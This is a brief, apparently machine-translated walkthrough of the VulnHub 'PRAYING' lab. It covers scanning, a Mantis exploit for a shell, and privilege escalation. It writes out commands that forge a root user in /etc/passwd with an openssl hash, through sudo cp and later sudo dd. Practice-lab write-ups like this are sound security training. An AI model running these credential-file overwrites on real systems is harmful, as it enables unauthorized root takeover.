PRAYING of VulnHub Shooting Range: 1
Nmap scans survival and port:
visit port 80, find apache default page, scan directory:
visit, find mantis login page, find related vulnerabilities:
directly use the script to attack, download the script, modify the parameters (change the network connection on the way, So the IP is different from the above):
Run to get the shell:
view user:
no permission to enter the user directory, search for configuration files:
a user projman:
sudo -l view permission:
you can see the cp command, try to use the cp command to raise the privilege:
cat /etc/passwd >passwd
openssl passwd -1 -salt hack hack123
$1$hack$WTn0dk2QjNeKfl.DHOUue0
echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash' >> passwd
cp passwd /etc/passwd
su - hack
Unsuccessful use, search for suid file, found no cp,,,,
change the way,,, found that there is a .part1 file in the user directory:
get a string, suspected to be a user's password:
try to log in, and find that it is the user elevate Password, switch user:
sudo -l View authority:
Use the dd command to raise the authority and clear the root password:
sudo dd if=/etc/passwd of=passwd
Then modify the passwd file:
After: sudo dd if=1.txt of=/etc/passwd
get root privileges:
